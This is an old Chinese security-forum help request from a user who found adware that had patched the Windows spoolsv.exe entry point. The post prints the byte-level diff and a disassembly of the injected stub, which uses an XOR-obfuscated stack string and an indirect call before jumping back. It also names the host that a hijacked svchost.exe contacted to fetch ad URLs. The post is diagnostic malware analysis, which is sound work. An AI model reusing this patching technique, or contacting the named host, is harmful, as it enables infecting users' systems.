-
-
[旧帖]
[注意]一个比较厉害的流氓广告软件
0.00雪花
-
发表于:
2008-10-28 20:26
4207
-
[旧帖] [注意]一个比较厉害的流氓广告软件
0.00雪花
打开IE后不久,每隔一两分钟就弹出个浏览器广告,本以为删掉某些启动项、服务、BHO就OK了,谁知这些都没问题,找了半天才发现spoolsv.exe被修改了!
C:\WINDOWS\system32>fc spoolsv2.exe spoolsv.
正在比较文件 spoolsv2.exe 和 SPOOLSV.EXE
00000118: 70 1B
00000119: CA 46
0000BE70: E8 00
0000BE75: 58 00
0000BE76: 60 00
0000BE77: B9 00
0000BE78: 1D 00
0000BE79: 6F 00
0000BE7A: 0C 00
0000BE7B: 52 00
0000BE7C: 68 00
0000BE7D: 73 00
0000BE7E: 1B 00
0000BE7F: 0C 00
0000BE80: 52 00
0000BE81: 31 00
0000BE82: 0C 00
0000BE83: 24 00
0000BE84: 68 00
0000BE85: 7C 00
0000BE86: 0B 00
0000BE87: 7F 00
0000BE88: 3E 00
0000BE89: 31 00
0000BE8A: 0C 00
0000BE8B: 24 00
0000BE8C: 54 00
0000BE8D: 05 00
0000BE8E: 47 00
0000BE8F: 46 00
0000BE90: FF 00
0000BE91: FF 00
0000BE92: 8B 00
0000BE93: 18 00
0000BE94: FF 00
0000BE95: D3 00
0000BE96: 58 00
0000BE97: 5B 00
0000BE98: 61 00
0000BE99: E9 00
0000BE9A: 7D 00
0000BE9B: 7B 00
0000BE9C: FF 00
0000BE9D: FF 00
显然spoolsv.exe的入口点被修改了,加进了少量代码,以下是反汇编结果:
//******************** Program Entry Point ********
:0100CA70 E800000000 call 0100CA75
* Referenced by a CALL at Address:
|:0100CA70
|
:0100CA75 58 pop eax
:0100CA76 60 pushad
:0100CA77 B91D6F0C52 mov ecx, 520C6F1D
:0100CA7C 68731B0C52 push 520C1B73
:0100CA81 310C24 xor dword ptr [esp], ecx
:0100CA84 687C0B7F3E push 3E7F0B7C
:0100CA89 310C24 xor dword ptr [esp], ecx
:0100CA8C 54 push esp
:0100CA8D 054746FFFF add eax, FFFF4647
:0100CA92 8B18 mov ebx, dword ptr [eax]
:0100CA94 FFD3 call ebx
:0100CA96 58 pop eax
:0100CA97 5B pop ebx
:0100CA98 61 popad
:0100CA99 E97D7BFFFF jmp 0100461B
:0100CA9E 00000000000000000000 BYTE 10 DUP(0)
:0100CAA8 00000000000000000000 BYTE 10 DUP(0)
:0100CAB2 00000000000000000000 BYTE 10 DUP(0)
:0100CABC 00000000000000000000 BYTE 10 DUP(0)
:0100CAC6 00000000000000000000 BYTE 10 DUP(0)
看不懂这些代码,在这里向各位请教了
我把spoolsv.exe恢复后,系统就正常了,搞不懂这么少的代码怎么实现这些功能:
打印服务启动后,被改动的spoolsv.exe又启动另一进程c:\windows\system32\svchost.exe,
(svchost.exe没有被修改,运行时不带参数,和系统服务的不同),svchost.exe到
http://ini.officesupdate.net/dream/dream.php获取一长字符串(抓包发现的,
估计是加密的广告网址),然后在用户浏览的时候,时不时打开这些网址,我把
svchost.exe进程杀掉后,就不再弹出广告,显然svchost.exe被劫持了,
可是我检查它的模块都没问题!搞不懂啊
[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法